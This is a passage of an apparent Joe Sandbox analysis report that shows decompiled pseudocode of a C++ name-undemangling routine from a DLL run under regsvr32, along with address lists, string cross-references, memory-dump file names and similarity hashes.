				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x30], xmm0");
				E00007FFD7FFD2B06AC78(_t637, _t797 + 0x30, _t797 + 0x40);
				asm("movaps xmm5, [esp+0x30]");
				asm("movdqa [esp+0x40], xmm5");
				goto 0x2b06dc6a;
				E00007FFD7FFD2B06ADBC(_t797 + 0x30);
				if ( *(_t797 + 0x48) == 3) goto 0x2b06dc6a;
				if (_t637[1] - 1 <= 0) goto 0x2b06dc6a;
				 *(_t797 + 0x48) =  *(_t797 + 0x48) ^ (_t637[1] ^  *(_t797 + 0x48)) & 0x000000ff;
				if ( *_t811 == 0) goto 0x2b06dcc2;
				if ( *(_t797 + 0x40) == 0) goto 0x2b06dcb7;
				if (( *0x2b0c9a8c & 0x00001000) != 0) goto 0x2b06dcb7;
				E00007FFD7FFD2B06A9A8(0x20, _t637, _t794 - 0x79);
				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x30], xmm0");
				E00007FFD7FFD2B06AC78(_t637, _t797 + 0x30, _t811);
				E00007FFD7FFD2B06AC78(_t637, _t797 + 0x40, _t797 + 0x30);
				goto 0x2b06dcc2;
				asm("inc ecx");
				asm("movdqu [esp+0x40], xmm0");
				 *(_t794 - 0x71) =  *(_t794 - 0x71) & 0xffff0000;
				r13d = 0;
				 *(_t794 - 0x79) =  *(_t794 - 0x79) & _t811;
				if ( *(_t794 + 0x7f) == r13d) goto 0x2b06dd35;
				E00007FFD7FFD2B06A838(_t794 - 0x59);
				_t643 = _t637;
				E00007FFD7FFD2B06A9E0(_t794 - 0x69, " ");
				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x30], xmm0");
				E00007FFD7FFD2B06AC78(_t637, _t797 + 0x30, _t637);
				E00007FFD7FFD2B06AC78(_t637, _t797 + 0x40, _t797 + 0x30);
				if (( *0x2b0c9a8c & 0x00001000) == 0) goto 0x2b06dd2f;
				asm("movaps xmm0, [esp+0x40]");
				goto 0x2b06d7d2;
				asm("movaps xmm6, [ebp-0x79]");
				goto 0x2b06dd73;
				r8d = 0;
				E00007FFD7FFD2B069E00(_t637, 0x2b0c9a38, _t797 + 0x30, _t791);
				if (_t637 == 0) goto 0x2b06dd61;
				 *_t637 =  *_t637 & 0x00000000;
				_t637[1] = 0;
				_t637[1] = _t637[1] & 0xffff00ff;
				goto 0x2b06dd64;
				r13d = 0;
				E00007FFD7FFD2B06A838(_t794 - 0x69);
				asm("movups xmm6, [eax]");
				r12d =  !=  ?  *(_t794 + 0x77) : r12d;
				if (r12d == 0) goto 0x2b06deaf;
				if (r15d == 0) goto 0x2b06de78;
				if ((_t523 & 0x00000700) != 0x600) goto 0x2b06de16;
				E00007FFD7FFD2B06A9E0(_t794 - 0x69, "`vtordispex{");
				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x30], xmm0");
				E00007FFD7FFD2B06AC78(_t637, _t797 + 0x30, _t794 - 0x19);
				asm("movaps xmm5, [esp+0x30]");
				asm("movdqa [esp+0x30], xmm5");
				E00007FFD7FFD2B06AF5C(0x2c, _t523, _t637, _t637, _t797 + 0x30, _t791, 0x2b08398d);
				asm("movaps xmm5, [esp+0x30]");
				asm("movdqa [esp+0x30], xmm5");
				E00007FFD7FFD2B06AC78(_t637, _t797 + 0x30, _t794 - 9);
				asm("movaps xmm5, [esp+0x30]");
				asm("movdqa [esp+0x30], xmm5");
				E00007FFD7FFD2B06AF5C(0x2c, _t523, _t637, _t637, _t797 + 0x30, _t791, 0x2b08398d);
				asm("movaps xmm5, [esp+0x30]");
				asm("movdqa [esp+0x30], xmm5");
				goto 0x2b06de42;
				if (r15d == 0) goto 0x2b06de78;
				if ((_t523 & 0x00000700) != 0x500) goto 0x2b06de78;
				E00007FFD7FFD2B06A9E0(_t794 - 0x69, "`vtordisp{");
				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x30], xmm0");
				E00007FFD7FFD2B06AC78(_t637, _t797 + 0x30, _t794 - 0x29);
				asm("movaps xmm5, [esp+0x30]");
				asm("movdqa [esp+0x30], xmm5");
				E00007FFD7FFD2B06AF5C(0x2c, _t523, _t637, _t637, _t797 + 0x30, _t791, 0x2b08398d);
				E00007FFD7FFD2B06AC78(_t637, _t797 + 0x40, _t797 + 0x30);
				goto 0x2b06de89;
				E00007FFD7FFD2B06AFE0( *(_t797 + 0x48) ^ (_t637[1] ^  *(_t797 + 0x48)) & 0x000000ff, _t523, _t637, _t637, _t797 + 0x40, "`adjustor{", _t791, 0x2b08398d);
				asm("movdqa [esp+0x30], xmm7");
				E00007FFD7FFD2B06AFE0( *(_t797 + 0x48) ^ (_t637[1] ^  *(_t797 + 0x48)) & 0x000000ff, _t523, _t637, _t643, _t797 + 0x30, "}\' ", _t791, 0x2b08398d);
				E00007FFD7FFD2B06AC78(_t637, _t797 + 0x40, _t797 + 0x30);
				E00007FFD7FFD2B06B594(0x2c, _t523, _t794 - 0x69, _t797 + 0x30, _t791, 0x2b08398d, _t806);
				_t644 = _t637;
				E00007FFD7FFD2B06A9A8(0x28, _t637, _t794 - 0x79);
				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x30], xmm0");
				E00007FFD7FFD2B06AC78(_t637, _t797 + 0x30, _t637);
				asm("movaps xmm5, [esp+0x30]");
				asm("movdqa [esp+0x30], xmm5");
				E00007FFD7FFD2B06AF5C(0x29, _t523, _t637, _t637, _t797 + 0x30, _t791, 0x2b08398d);
				E00007FFD7FFD2B06AC78(_t637, _t797 + 0x40, _t797 + 0x30);
				if (r15d == 0) goto 0x2b06df23;
				if ((_t523 & 0x00000700) == 0x200) goto 0x2b06df23;
				E00007FFD7FFD2B06AC78(_t637, _t797 + 0x40, _t794 - 0x49);
				_t369 =  *0x2b0c9a8c; // 0x0
				if (( !(_t369 >> 8) & 0x00000001) == 0) goto 0x2b06df4a;
				E00007FFD7FFD2B06B69C(0x29, _t523, _t637, _t794 - 0x69, _t794 - 0x49, _t789, _t791, 0x2b08398d, _t806);
				E00007FFD7FFD2B06AC78(_t637, _t797 + 0x40, _t637);
				goto 0x2b06df6f;
				E00007FFD7FFD2B06B69C(0x29, _t523, _t637, _t797 + 0x40, _t637, _t789, _t791, 0x2b08398d, _t806);
				if ( *(_t797 + 0x48) == 3) goto 0x2b06df6f;
				if (_t637[1] - 1 <= 0) goto 0x2b06df6f;
				 *(_t797 + 0x48) =  *(_t797 + 0x48) ^ (_t637[1] ^  *(_t797 + 0x48)) & 0x000000ff;
				_t378 =  *0x2b0c9a8c; // 0x0
				if (( !(_t378 >> 2) & 0x00000001) == 0) goto 0x2b06df93;
				if (_t637 == 0) goto 0x2b06df93;
				asm("movaps xmm0, [esp+0x40]");
				asm("repe inc ecx");
				goto 0x2b06da97;
				asm("movaps xmm6, [esp+0x40]");
				r13d =  *(_t794 + 0x6f);
				goto 0x2b06e21d;
				E00007FFD7FFD2B06AC78(_t637, _t797 + 0x40, _t637);
				r11d = 0x7c00;
				if (r14d != 0) goto 0x2b06dfe8;
				if ((_t523 & r11d) != 0x6800) goto 0x2b06dfd7;
				E00007FFD7FFD2B06BD90( *(_t797 + 0x48) ^ (_t637[1] ^  *(_t797 + 0x48)) & 0x000000ff, _t523, _t637, _t789, _t789, _t791);
				goto 0x2b06e411;
				if (r14d != 0) goto 0x2b06dfe8;
				if ((_t523 & r11d) == 0x7000) goto 0x2b06dfc5;
				if (r14d != 0) goto 0x2b06e0bb;
				if ((_t523 & r11d) != 0x6000) goto 0x2b06e057;
				E00007FFD7FFD2B06B32C(0, _t637, _t637, _t794 - 0x79, _t789, _t791, _t803, _t806);
				asm("movaps xmm5, [esp+0x40]");
				asm("movdqa [esp+0x30], xmm5");
				E00007FFD7FFD2B06AF5C(0x7b, _t523, _t637, _t644, _t797 + 0x30, _t791, 0x2b08398d);
				asm("movaps xmm5, [esp+0x30]");
				asm("movdqa [esp+0x30], xmm5");
				E00007FFD7FFD2B06AC78(_t637, _t797 + 0x30, _t794 - 0x79);
				asm("movaps xmm5, [esp+0x30]");
				asm("movdqu [edi], xmm5");
				E00007FFD7FFD2B06AFE0(0x6000, _t523, _t637, _t644, _t789, "}\'", _t791, 0x2b08398d);
				goto 0x2b06e411;
				if (r14d != 0) goto 0x2b06e0bb;
				if ((_t523 & r11d) != r11d) goto 0x2b06e0bb;
				asm("movaps xmm0, [esp+0x40]");
				asm("movdqu [edi], xmm0");
				E00007FFD7FFD2B06AFE0(0x6000, _t523, _t637, _t644, _t789, "{for ", _t791, 0x2b08398d);
				E00007FFD7FFD2B06E6CC(0x7b, _t523, _t644, _t794 - 0x69, _t789, _t791, 0x2b08398d, _t803, _t806);
				E00007FFD7FFD2B06AC78(_t637, _t789, _t637);
				E00007FFD7FFD2B06AF5C(0x7d, _t523, _t637, _t644, _t789, _t791, 0x2b08398d);
				_t638 =  *0x2b0c9a70; // 0x0
				if ( *_t638 != 0x40) goto 0x2b06e411;
				_t639 = _t638 + 1;
				 *0x2b0c9a70 = _t638 + 1;
				goto 0x2b06e411;
				r15d = 0;
				r13d = _t523;
				r13d = r13d & 0x00001800;
				r12d = _t523;
				r15b = r13d == 0x800;
				_t593 = 0x00006000 & _t523;
				_t471 =  !=  ? r15d : _t593 == 0;
				r12d = r12d & 0x00001000;
				 *((intOrPtr*)(_t794 - 0x39)) =  !=  ? r15d : _t593 == 0;
				r12d =  !=  ? _t523 & 0x00000400 : r12d;
				if (r12d == 0) goto 0x2b06e18a;
				asm("sbb eax, eax");
				if (((0 | (_t523 & 0x00001b00) == 0x00001000) & _t523 & 0x00001b00) == 0) goto 0x2b06e12c;
				goto 0x2b06e17e;
				if (r12d == 0) goto 0x2b06e18a;
				asm("sbb eax, eax");
				if (((0 | (_t523 & 0x00001b00) == 0x00001100) & _t523 & 0x00001b00) == 0) goto 0x2b06e156;
				goto 0x2b06e17e;
				if (r12d == 0) goto 0x2b06e18a;
				asm("sbb eax, eax");
				if (((0 | (_t523 & 0x00001b00) == 0x00001200) & _t523 & 0x00001b00) == 0) goto 0x2b06e18a;
				E00007FFD7FFD2B06AFE0((_t523 & 0x00001b00) == 0x1200, _t523, _t638 + 1, _t644, _t797 + 0x40, "`template static data member destructor helper\'", _t791, 0x2b08398d);
				goto 0x2b06e19f;
				if (r14d != 0) goto 0x2b06e19f;
				if ((_t523 & r11d) == 0x7800) goto 0x2b06dd25;
				if (r12d == 0) goto 0x2b06e207;
				_t519 = _t523 & 0x00001b00;
				asm("sbb eax, eax");
				if (((0 | _t519 == 0x00001100) &  ~r14d) != 0) goto 0x2b06e1d8;
				asm("sbb eax, eax");
				if ((_t519 == 0x00001200 &  ~r14d) == 0) goto 0x2b06e207;
				E00007FFD7FFD2B06A9E0(_t794 - 0x69, " ");
				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x30], xmm0");
				E00007FFD7FFD2B06AC78(_t638 + 1, _t797 + 0x30, _t797 + 0x40);
				asm("movaps xmm6, [esp+0x30]");
				goto 0x2b06e218;
				E00007FFD7FFD2B070364(_t519 == 0x1200, _t522, _t523, _t519 == 0x00001200 &  ~r14d, _t638 + 1, _t644, _t794 - 0x69, _t797 + 0x40, _t789, _t791, 0x2b08398d, _t803, _t806, _t808);
				asm("movups xmm6, [eax]");
				asm("movaps [esp+0x40], xmm6");
				if ( *((intOrPtr*)(_t794 - 0x39)) == 0) goto 0x2b06e397;
				_t417 =  *0x2b0c9a8c; // 0x0
				if (( !(_t417 >> 9) & 0x00000001) == 0) goto 0x2b06e2ea;
				_t450 = _t523 & 0x00000700;
				_t614 = _t450 - 0x200;
				_t421 =  !=  ? _t614 == 0 : 1;
				_t616 =  !=  ? _t614 == 0 : 1;
				if (( !=  ? _t614 == 0 : 1) == 0) goto 0x2b06e28e;
				E00007FFD7FFD2B06A9E0(_t794 - 0x69, "static ");
				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x30], xmm0");
				E00007FFD7FFD2B06AC78(_t638 + 1, _t797 + 0x30, _t797 + 0x40);
				asm("movaps xmm6, [esp+0x30]");
				asm("movaps [esp+0x40], xmm6");
				if (r14d == 0) goto 0x2b06e29b;
				if (_t450 == 0x100) goto 0x2b06e2b8;
				if (r12d == 0) goto 0x2b06e2ea;
				if (_t450 == 0x500) goto 0x2b06e2b8;
				if (_t450 == 0x600) goto 0x2b06e2b8;
				if (_t450 != 0x400) goto 0x2b06e2ea;
				E00007FFD7FFD2B06A9E0(_t794 - 0x69, "virtual ");
				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x30], xmm0");
				E00007FFD7FFD2B06AC78(_t638 + 1, _t797 + 0x30, _t797 + 0x40);
				asm("movaps xmm6, [esp+0x30]");
				asm("movaps [esp+0x40], xmm6");
				_t426 =  *0x2b0c9a8c; // 0x0
				if (( !(_t426 >> 7) & 0x00000001) == 0) goto 0x2b06e397;
				_t521 = _t523 & 0x000000c0;
				r15d =  !=  ? 0 | _t521 == 0x00000040 : r15d;
				if (r15d == 0) goto 0x2b06e322;
				goto 0x2b06e36c;
				_t627 = _t521 - 0x80;
				_t628 = r13d - 0x1000;
				_t433 =  !=  ? _t627 == 0 : _t628 == 0;
				_t630 =  !=  ? _t627 == 0 : _t628 == 0;
				if (( !=  ? _t627 == 0 : _t628 == 0) == 0) goto 0x2b06e34c;
				goto 0x2b06e36c;
				_t631 = _t521;
				_t632 = r13d;
				_t436 =  !=  ? _t631 == 0 : _t632 == 0;
				_t634 =  !=  ? _t631 == 0 : _t632 == 0;
				if (( !=  ? _t631 == 0 : _t632 == 0) == 0) goto 0x2b06e397;
				E00007FFD7FFD2B06A9E0(_t794 - 0x69, "public: ");
				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x30], xmm0");
				E00007FFD7FFD2B06AC78(_t639, _t797 + 0x30, _t797 + 0x40);
				asm("movaps xmm6, [esp+0x30]");
				asm("movaps [esp+0x40], xmm6");
				if (r12d == 0) goto 0x2b06e3da;
				_t636 =  *0x2b0c9a8c & 0x00001000;
				if (_t636 != 0) goto 0x2b06e3da;
				E00007FFD7FFD2B06A9E0(_t794 - 0x69, "[thunk]:");
				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x30], xmm0");
				E00007FFD7FFD2B06AC78(_t639, _t797 + 0x30, _t797 + 0x40);
				asm("movaps xmm6, [esp+0x30]");
				asm("movaps [esp+0x40], xmm6");
				asm("bt esi, 0x10");
				if (_t636 >= 0) goto 0x2b06e40d;
				E00007FFD7FFD2B06A9E0(_t794 - 0x69, "extern \"C\" ");
				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x30], xmm0");
				_t442 = E00007FFD7FFD2B06AC78(_t639, _t797 + 0x30, _t797 + 0x40);
				asm("movaps xmm6, [esp+0x30]");
				asm("movdqu [edi], xmm6");
				asm("inc ecx");
				asm("inc ecx");
				return _t442;
			}

0x7ffd2b06d720
0x7ffd2b06d720
0x7ffd2b06d720
0x7ffd2b06d723
0x7ffd2b06d732
0x7ffd2b06d736
0x7ffd2b06d73d
0x7ffd2b06d743
0x7ffd2b06d74b
0x7ffd2b06d74f
0x7ffd2b06d753
0x7ffd2b06d756
0x7ffd2b06d759
0x7ffd2b06d763
0x7ffd2b06d765
0x7ffd2b06d76f
0x7ffd2b06d771
0x7ffd2b06d778
0x7ffd2b06d77a
0x7ffd2b06d783
0x7ffd2b06d785
0x7ffd2b06d78c
0x7ffd2b06d790
0x7ffd2b06d794
0x7ffd2b06d79e
0x7ffd2b06d7aa
0x7ffd2b06d7b5
0x7ffd2b06d7b8
0x7ffd2b06d7bc
0x7ffd2b06d7c1
0x7ffd2b06d7c6
0x7ffd2b06d7cb
0x7ffd2b06d7cd
0x7ffd2b06d7d2
0x7ffd2b06d7d6
0x7ffd2b06d7db
0x7ffd2b06d7de
0x7ffd2b06d7e5
0x7ffd2b06d7eb
0x7ffd2b06d7f0
0x7ffd2b06d7f3
0x7ffd2b06d806
0x7ffd2b06d809
0x7ffd2b06d80d
0x7ffd2b06d810
0x7ffd2b06d81c
0x7ffd2b06d820
0x7ffd2b06d823
0x7ffd2b06d826
0x7ffd2b06d82a
0x7ffd2b06d82c
0x7ffd2b06d837
0x7ffd2b06d843
0x7ffd2b06d846
0x7ffd2b06d848
0x7ffd2b06d84c
0x7ffd2b06d856
0x7ffd2b06d85c
0x7ffd2b06d861
0x7ffd2b06d867
0x7ffd2b06d86b
0x7ffd2b06d871
0x7ffd2b06d87f
0x7ffd2b06d889
0x7ffd2b06d890
0x7ffd2b06d89b
0x7ffd2b06d89e
0x7ffd2b06d8aa
0x7ffd2b06d8ad
0x7ffd2b06d8b2
0x7ffd2b06d8b7
0x7ffd2b06d8be
0x7ffd2b06d8c4
0x7ffd2b06d8cb
0x7ffd2b06d8d5
0x7ffd2b06d8db
0x7ffd2b06d8ec
0x7ffd2b06d8f6
0x7ffd2b06d8fd
0x7ffd2b06d909
0x7ffd2b06d916
0x7ffd2b06d921
0x7ffd2b06d926
0x7ffd2b06d92b
0x7ffd2b06d935
0x7ffd2b06d93d
0x7ffd2b06d942
0x7ffd2b06d950
0x7ffd2b06d955
0x7ffd2b06d960
0x7ffd2b06d966
0x7ffd2b06d973
0x7ffd2b06d978
0x7ffd2b06d97b
0x7ffd2b06d97d
0x7ffd2b06d98b
0x7ffd2b06d992
0x7ffd2b06d997
0x7ffd2b06d9a2
0x7ffd2b06d9b1
0x7ffd2b06d9ba
0x7ffd2b06d9c7
0x7ffd2b06d9ca
0x7ffd2b06d9cf
0x7ffd2b06d9d4
0x7ffd2b06d9e3
0x7ffd2b06d9e8
0x7ffd2b06d9f6
0x7ffd2b06da07
0x7ffd2b06da11
0x7ffd2b06da16
0x7ffd2b06da26
0x7ffd2b06da34
0x7ffd2b06da36
0x7ffd2b06da3c
0x7ffd2b06da41
0x7ffd2b06da4d
0x7ffd2b06da5b
0x7ffd2b06da5e
0x7ffd2b06da63
0x7ffd2b06da68
0x7ffd2b06da72
0x7ffd2b06da77
0x7ffd2b06da81
0x7ffd2b06da89
0x7ffd2b06da8e
0x7ffd2b06da93
0x7ffd2b06da97
0x7ffd2b06da9b
0x7ffd2b06daa3
0x7ffd2b06daa8
0x7ffd2b06daad
0x7ffd2b06dab2
0x7ffd2b06dab7
0x7ffd2b06dabc
0x7ffd2b06dac5
0x7ffd2b06dac8
0x7ffd2b06dacb
0x7ffd2b06dace
0x7ffd2b06dad1
0x7ffd2b06dad9
0x7ffd2b06dadc
0x7ffd2b06dae0
0x7ffd2b06dae2
0x7ffd2b06daeb
0x7ffd2b06daf9
0x7ffd2b06db02
0x7ffd2b06db0e
0x7ffd2b06db13
0x7ffd2b06db18
0x7ffd2b06db1d
0x7ffd2b06db22
0x7ffd2b06db27
0x7ffd2b06db2c
0x7ffd2b06db3a
0x7ffd2b06db43
0x7ffd2b06db48
0x7ffd2b06db4d
0x7ffd2b06db59
0x7ffd2b06db63
0x7ffd2b06db68
0x7ffd2b06db6a
0x7ffd2b06db71
0x7ffd2b06db83
0x7ffd2b06db85
0x7ffd2b06db88
0x7ffd2b06db8b
0x7ffd2b06db91
0x7ffd2b06db96
0x7ffd2b06db9e
0x7ffd2b06dbb4
0x7ffd2b06dbbe
0x7ffd2b06dbc3
0x7ffd2b06dbc8
0x7ffd2b06dbcd
0x7ffd2b06dbd7
0x7ffd2b06dbe0
0x7ffd2b06dbe7
0x7ffd2b06dbf5
0x7ffd2b06dbf8
0x7ffd2b06dc06
0x7ffd2b06dc10
0x7ffd2b06dc16
0x7ffd2b06dc25
0x7ffd2b06dc28
0x7ffd2b06dc2e
0x7ffd2b06dc33
0x7ffd2b06dc38
0x7ffd2b06dc3e
0x7ffd2b06dc45
0x7ffd2b06dc4f
0x7ffd2b06dc55
0x7ffd2b06dc66
0x7ffd2b06dc6f
0x7ffd2b06dc77
0x7ffd2b06dc83
0x7ffd2b06dc8b
0x7ffd2b06dc98
0x7ffd2b06dc9b
0x7ffd2b06dca1
0x7ffd2b06dcb0
0x7ffd2b06dcb5
0x7ffd2b06dcb7
0x7ffd2b06dcbc
0x7ffd2b06dcc2
0x7ffd2b06dcc9
0x7ffd2b06dccc
0x7ffd2b06dcd4
0x7ffd2b06dcdc
0x7ffd2b06dcec
0x7ffd2b06dcef
0x7ffd2b06dcfc
0x7ffd2b06dcff
0x7ffd2b06dd05
0x7ffd2b06dd14
0x7ffd2b06dd23
0x7ffd2b06dd25
0x7ffd2b06dd2a
0x7ffd2b06dd2f
0x7ffd2b06dd33
0x7ffd2b06dd35
0x7ffd2b06dd43
0x7ffd2b06dd4e
0x7ffd2b06dd50
0x7ffd2b06dd54
0x7ffd2b06dd58
0x7ffd2b06dd5f
0x7ffd2b06dd61
0x7ffd2b06dd6b
0x7ffd2b06dd70
0x7ffd2b06dd76
0x7ffd2b06dd7e
0x7ffd2b06dd87
0x7ffd2b06dd99
0x7ffd2b06dda6
0x7ffd2b06ddb4
0x7ffd2b06ddb7
0x7ffd2b06ddbd
0x7ffd2b06ddc2
0x7ffd2b06ddce
0x7ffd2b06ddd4
0x7ffd2b06dddd
0x7ffd2b06dde7
0x7ffd2b06dded
0x7ffd2b06ddf7
0x7ffd2b06ddfe
0x7ffd2b06de04
0x7ffd2b06de09
0x7ffd2b06de0e
0x7ffd2b06de14
0x7ffd2b06de19
0x7ffd2b06de27
0x7ffd2b06de34
0x7ffd2b06de39
0x7ffd2b06de3c
0x7ffd2b06de4b
0x7ffd2b06de57
0x7ffd2b06de5c
0x7ffd2b06de62
0x7ffd2b06de71
0x7ffd2b06de76
0x7ffd2b06de84
0x7ffd2b06de95
0x7ffd2b06de9b
0x7ffd2b06deaa
0x7ffd2b06deb3
0x7ffd2b06debe
0x7ffd2b06dec1
0x7ffd2b06dece
0x7ffd2b06ded1
0x7ffd2b06ded7
0x7ffd2b06dedc
0x7ffd2b06dee8
0x7ffd2b06deee
0x7ffd2b06defd
0x7ffd2b06df05
0x7ffd2b06df13
0x7ffd2b06df1e
0x7ffd2b06df23
0x7ffd2b06df34
0x7ffd2b06df36
0x7ffd2b06df43
0x7ffd2b06df48
0x7ffd2b06df4a
0x7ffd2b06df54
0x7ffd2b06df5a
0x7ffd2b06df6b
0x7ffd2b06df6f
0x7ffd2b06df7c
0x7ffd2b06df81
0x7ffd2b06df83
0x7ffd2b06df88
0x7ffd2b06df8e
0x7ffd2b06df93
0x7ffd2b06df98
0x7ffd2b06df9c
0x7ffd2b06dfa9
0x7ffd2b06dfae
0x7ffd2b06dfb7
0x7ffd2b06dfc3
0x7ffd2b06dfcd
0x7ffd2b06dfd2
0x7ffd2b06dfda
0x7ffd2b06dfe6
0x7ffd2b06dff0
0x7ffd2b06dffd
0x7ffd2b06e005
0x7ffd2b06e011
0x7ffd2b06e016
0x7ffd2b06e01c
0x7ffd2b06e02a
0x7ffd2b06e02f
0x7ffd2b06e035
0x7ffd2b06e044
0x7ffd2b06e049
0x7ffd2b06e04d
0x7ffd2b06e052
0x7ffd2b06e05a
0x7ffd2b06e064
0x7ffd2b06e066
0x7ffd2b06e075
0x7ffd2b06e079
0x7ffd2b06e082
0x7ffd2b06e08d
0x7ffd2b06e097
0x7ffd2b06e09c
0x7ffd2b06e0a6
0x7ffd2b06e0ac
0x7ffd2b06e0af
0x7ffd2b06e0b6
0x7ffd2b06e0bb
0x7ffd2b06e0be
0x7ffd2b06e0c3
0x7ffd2b06e0ca
0x7ffd2b06e0d4
0x7ffd2b06e0d8
0x7ffd2b06e0e5
0x7ffd2b06e0ee
0x7ffd2b06e0f7
0x7ffd2b06e0fa
0x7ffd2b06e101
0x7ffd2b06e11d
0x7ffd2b06e121
0x7ffd2b06e12a
0x7ffd2b06e12f
0x7ffd2b06e147
0x7ffd2b06e14b
0x7ffd2b06e154
0x7ffd2b06e159
0x7ffd2b06e171
0x7ffd2b06e175
0x7ffd2b06e183
0x7ffd2b06e188
0x7ffd2b06e18d
0x7ffd2b06e199
0x7ffd2b06e1a2
0x7ffd2b06e1ab
0x7ffd2b06e1bc
0x7ffd2b06e1c0
0x7ffd2b06e1d2
0x7ffd2b06e1d6
0x7ffd2b06e1e3
0x7ffd2b06e1f2
0x7ffd2b06e1f5
0x7ffd2b06e1fb
0x7ffd2b06e200
0x7ffd2b06e205
0x7ffd2b06e210
0x7ffd2b06e215
0x7ffd2b06e218
0x7ffd2b06e221
0x7ffd2b06e227
0x7ffd2b06e234
0x7ffd2b06e243
0x7ffd2b06e249
0x7ffd2b06e255
0x7ffd2b06e258
0x7ffd2b06e25a
0x7ffd2b06e267
0x7ffd2b06e276
0x7ffd2b06e279
0x7ffd2b06e27f
0x7ffd2b06e284
0x7ffd2b06e289
0x7ffd2b06e291
0x7ffd2b06e299
0x7ffd2b06e29e
0x7ffd2b06e2a6
0x7ffd2b06e2ae
0x7ffd2b06e2b6
0x7ffd2b06e2c3
0x7ffd2b06e2d2
0x7ffd2b06e2d5
0x7ffd2b06e2db
0x7ffd2b06e2e0
0x7ffd2b06e2e5
0x7ffd2b06e2ea
0x7ffd2b06e2f7
0x7ffd2b06e301
0x7ffd2b06e310
0x7ffd2b06e317
0x7ffd2b06e320
0x7ffd2b06e324
0x7ffd2b06e32f
0x7ffd2b06e33c
0x7ffd2b06e33f
0x7ffd2b06e341
0x7ffd2b06e34a
0x7ffd2b06e34e
0x7ffd2b06e355
0x7ffd2b06e35e
0x7ffd2b06e361
0x7ffd2b06e363
0x7ffd2b06e370
0x7ffd2b06e37f
0x7ffd2b06e382
0x7ffd2b06e388
0x7ffd2b06e38d
0x7ffd2b06e392
0x7ffd2b06e39a
0x7ffd2b06e39c
0x7ffd2b06e3a6
0x7ffd2b06e3b3
0x7ffd2b06e3c2
0x7ffd2b06e3c5
0x7ffd2b06e3cb
0x7ffd2b06e3d0
0x7ffd2b06e3d5
0x7ffd2b06e3da
0x7ffd2b06e3de
0x7ffd2b06e3eb
0x7ffd2b06e3fa
0x7ffd2b06e3fd
0x7ffd2b06e403
0x7ffd2b06e408
0x7ffd2b06e40d
0x7ffd2b06e420
0x7ffd2b06e425
0x7ffd2b06e438

APIs

DName::operator+=.LIBCMT ref: 00007FFD2B06D7BC
DName::DName.LIBCMT ref: 00007FFD2B06D89E
DName::operator+=.LIBCMT ref: 00007FFD2B06D8B2
DName::operator+=.LIBCMT ref: 00007FFD2B06D92B
DName::operator+=.LIBCMT ref: 00007FFD2B06D942
DName::operator+=.LIBCMT ref: 00007FFD2B06D950

Strings

`template static data member destructor helper', xrefs: 00007FFD2B06E177
extern "C" , xrefs: 00007FFD2B06E3E0
public: , xrefs: 00007FFD2B06E365
`template static data member constructor helper', xrefs: 00007FFD2B06E14D
static , xrefs: 00007FFD2B06E25C
{for , xrefs: 00007FFD2B06E06B
`local static destructor helper', xrefs: 00007FFD2B06E123
}' , xrefs: 00007FFD2B06D9D8, 00007FFD2B06DE89
[thunk]:, xrefs: 00007FFD2B06E3A8
`vtordispex{, xrefs: 00007FFD2B06DD9B
virtual , xrefs: 00007FFD2B06E2B8
`adjustor{, xrefs: 00007FFD2B06DE78
private: , xrefs: 00007FFD2B06E319
`vtordisp{, xrefs: 00007FFD2B06DE29
{flat}, xrefs: 00007FFD2B06D980
protected: , xrefs: 00007FFD2B06E343

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Name::operator+=$NameName::
String ID: [thunk]:$`adjustor{$`local static destructor helper'$`template static data member constructor helper'$`template static data member destructor helper'$`vtordispex{$`vtordisp{$extern "C" $private: $protected: $public: $static $virtual ${flat}${for $}'
API String ID: 2762593306-3103905019
Opcode ID: 57be1ad3dfe50d439c9b124d4c822f8f83c416cee76769d434b5545308469df5
Instruction ID: 094b5547e56c6fde172d73c1a828b89d309b562a9297aca136082d0f0b80c5e9
Opcode Fuzzy Hash: 57be1ad3dfe50d439c9b124d4c822f8f83c416cee76769d434b5545308469df5
Instruction Fuzzy Hash: 59820522F19A438AF7029B25C9623FD6360FF96344F505230EA8E525B5EFBCE584D780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B06EFA4 Relevance: 65.2, APIs: 35, Strings: 2, Instructions: 472
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 57%

			E00007FFD7FFD2B06EFA4(long long __rbx, long long* __rcx, intOrPtr* __rdx, long long __rsi, long long __r8, intOrPtr* __r9, void* __r10, void* __r11) {
				void* __rdi;
				void* __r12;
				unsigned int _t193;
				signed int _t199;
				void* _t222;
				char _t223;
				intOrPtr _t227;
				signed int _t233;
				signed int _t258;
				void* _t265;
				void* _t318;
				char* _t319;
				char* _t320;
				long long _t321;
				char* _t322;
				char* _t323;
				intOrPtr* _t324;
				intOrPtr* _t325;
				intOrPtr* _t326;
				intOrPtr* _t327;
				long long _t328;
				long long* _t331;
				intOrPtr _t382;
				intOrPtr _t385;
				void* _t409;
				intOrPtr _t410;
